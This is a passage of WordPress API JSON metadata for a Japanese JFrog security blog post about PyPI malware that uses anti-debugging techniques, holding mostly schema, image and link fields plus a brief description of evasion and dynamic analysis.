\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/http:\/\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png","type":"image\/png"}],"author":"satoy","twitter_card":"summary_large_image","twitter_creator":"@jfrog","twitter_site":"@jfrog","twitter_misc":{"Written by":"satoy","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#article","isPartOf":{"@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/"},"author":{"name":"satoy","@id":"https:\/\/jfrog.com\/ja\/#\/schema\/person\/43b1ce9ab6149ce238061dd78a60d89c"},"headline":"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u6210\u8005\u306b\u652f\u6301\u3055\u308c\u308b\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u306e\u30c6\u30af\u30cb\u30c3\u30af","datePublished":"2022-12-30T03:20:04+00:00","dateModified":"2022-12-30T03:20:04+00:00","mainEntityOfPage":{"@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/"},"wordCount":160,"publisher":{"@id":"https:\/\/jfrog.com\/ja\/#organization"},"image":{"@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage"},"thumbnailUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png","keywords":["PyPI","\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ea\u30b5\u30fc\u30c1","\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3"],"articleSection":["Security and DevSecOps","Xray"],"inLanguage":"ja"},{"@type":"WebPage","@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/","url":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/","name":"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u30c6\u30af\u30cb\u30c3\u30af | JFrog Japan","isPartOf":{"@id":"https:\/\/jfrog.com\/ja\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage"},"image":{"@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage"},"thumbnailUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png","datePublished":"2022-12-30T03:20:04+00:00","dateModified":"2022-12-30T03:20:04+00:00","description":"\u4eca\u65e5\u3001\u307b\u3068\u3093\u3069\u306ePyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u539f\u59cb\u7684\u306a\u5909\u6570\u306e\u64cd\u4f5c\u304b\u3089\u6d17\u7df4\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u5e73\u5766\u5316\u3084\u30b9\u30c6\u30ac\u30ce\u30b0\u30e9\u30d5\u30a3\u6280\u8853\u307e\u3067\u3001\u69d8\u3005\u306a\u6280\u8853\u3092\u4f7f\u3063\u3066\u9759\u7684\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9759\u7684\u9632\u5fa1\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u7d20\u65e9\u304f\u53d6\u308a\u9664\u304d\u3001\u305d\u306e\u80cc\u5f8c\u306e\u30ed\u30b8\u30c3\u30af\u3092\u660e\u3089\u304b\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002","breadcrumb":{"@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage","url":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png","contentUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png","width":203,"height":148,"caption":"PyPI malware are starting to employ Anti-Debug techniques"},{"@type":"BreadcrumbList","@id":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jfrog.com\/ja\/"},{"@type":"ListItem","position":2,"name":"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u6210\u8005\u306b\u652f\u6301\u3055\u308c\u308b\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u306e\u30c6\u30af\u30cb\u30c3\u30af"}]},{"@type":"WebSite","@id":"https:\/\/jfrog.com\/ja\/#website","url":"https:\/\/jfrog.com\/ja\/","name":"JFrog","description":"Deliver Trusted Software Releases at Speed and Scale","publisher":{"@id":"https:\/\/jfrog.com\/ja\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jfrog.com\/ja\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"ja"},{"@type":"Organization","@id":"https:\/\/jfrog.com\/ja\/#organization","name":"JFrog","url":"https:\/\/jfrog.com\/ja\/","logo":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/jfrog.com\/ja\/#\/schema\/logo\/image\/","url":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg","contentUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg","width":74,"height":73,"caption":"JFrog"},"image":{"@id":"https:\/\/jfrog.com\/ja\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/artifrog","https:\/\/x.com\/jfrog","https:\/\/www.linkedin.com\/company\/455737","https:\/\/www.youtube.com\/channel\/UCh2hNg76zo3d1qQqTWIQxDg","https:\/\/www.wikidata.org\/wiki\/Q98608948"],"description":"We set out on our Liquid Software journey in 2008, with the mission to transform the way enterprises manage and release software updates. The world expects software to update continuously, securely, non-intrusively and without user intervention. This hyper-connected experience can only be enabled by automation with an end-to-end DevOps platform and a binary-centric focus. With this in mind, we\u2019ve developed the JFrog Platform, ushering in a new era of DevOps and DevSecOps standards that power continuous updates. More than a decade after our founding, with thousands of customers and millions of users globally, JFrog has become the \u201cDatabase of DevOps\u201d and the de-facto standard in release and update management.","legalName":"Jfrog, Inc.","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1001","maxValue":"5000"}},{"@type":"Person","@id":"https:\/\/jfrog.com\/ja\/#\/schema\/person\/43b1ce9ab6149ce238061dd78a60d89c","name":"satoy","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/jfrog.com\/ja\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/53906f0995a35ce4ad703fc2eb1cdb130381259c17de328cca48e12c814c445a?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/53906f0995a35ce4ad703fc2eb1cdb130381259c17de328cca48e12c814c445a?s=96&d=mm&r=g","caption":"satoy"}}]}},"_links":{"self":[{"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/posts\/106411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/users\/448"}],"replies":[{"embeddable":true,"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/comments?post=106411"}],"version-history":[{"count":1,"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/posts\/106411\/revisions"}],"predecessor-version":[{"id":106412,"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/posts\/106411\/revisions\/106412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/media\/105096"}],"wp:attachment":[{"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/media?parent=106411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/categories?post=106411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/tags?post=106411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}